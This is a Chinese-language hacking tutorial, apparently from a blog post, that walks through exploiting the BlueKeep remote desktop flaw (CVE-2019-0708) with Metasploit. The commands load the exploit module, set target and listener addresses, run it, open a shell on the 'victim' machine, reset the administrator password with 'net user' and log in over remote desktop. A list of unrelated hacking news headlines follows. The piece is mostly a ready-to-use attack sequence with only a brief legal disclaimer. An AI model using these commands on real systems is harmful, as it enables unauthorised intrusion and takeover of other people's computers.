课前声明：
本分享仅做学习交流 ， 请自觉遵守法律法规！搜索：Kali与编程 ， 学习更多网络攻防干货！下篇文章将在明天下午五点发布 ， 敬请关注！
文章插图
二、战略安排
2.1 打开Metasploit渗透框架 ， 如下如所示 。
命令：msfconsole
文章插图
2.2 检索有关远程桌面的已知漏洞 ， 如下图所示 。
命令：search 0708
文章插图
2.3 使用检索到的关于远程桌面的漏洞利用模块 ， 如下图所示 。
命令：use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
文章插图
2.4 查看攻击目标需要设置的参数 ， 如下图所示 。
命令：show targets
文章插图
2.5 设置相关攻击参数 ， 如下图所示 。
命令：set rhosts 192.168.0.106
set lhost 192.168.0.102
set target 4
文章插图
文章插图
2.6 执行漏洞攻击模块 ， 如下图所示 。
命令：run
文章插图
文章插图
2.7 利用建立起来的会话查看受害者主机系统的相关信息 ， 如下图所示 。
命令：sysinfo
文章插图
2.8 利用建立起来的会话查看受害者主机系统的相关信息 ， 如下图所示 。
命令：ipconfig
文章插图
2.9 查看会话命令帮助信息 ， 如下图所示 。
命令：?
文章插图
2.10 进入受害者主机cmd界面并解决乱码问题 ， 如下图所示 。
命令：shell
chnp 65001
文章插图
2.11 利用“whoami”命令查看相关信息 ， 如下图所示 。
命令;whoami
文章插图
2.12 利用cmd命令在受害者主机创建一个新用户 ， 如下图所示 。
命令：net user administrator 123456
文章插图
2.13 利用图形化远程桌面登录工具登录受害者主机 ， 如下图所示 。
文章插图
文章插图
文章插图

• 黑客窃取250万个人数据 意大利运营商提醒用户尽快更换SIM卡
• T-Mobile证实黑客访问了用户电话记录
• 微软称SolarWinds黑客攻击波及公司内部的源代码存储库
• 有证据表明Citrix ADC设备被黑客滥用发起DDoS攻击
• 顶尖黑客“入侵”支付宝后，即将转账成功，屏幕却弹出27个字？
• 报道称第二个黑客组织已经瞄准了SolarWinds
• 还在偷看“成人网站”？当心手机被黑客偷窥！网友：咋不早说
• 手机出现这4种情况，你可能已被黑客监听，请及时关掉手机
• 一旦被黑客“监听”，手机多半会出现3大问题，望相互告知
• 微软承认在Solarwind攻击中也被黑客入侵 但没有被用于攻击第三方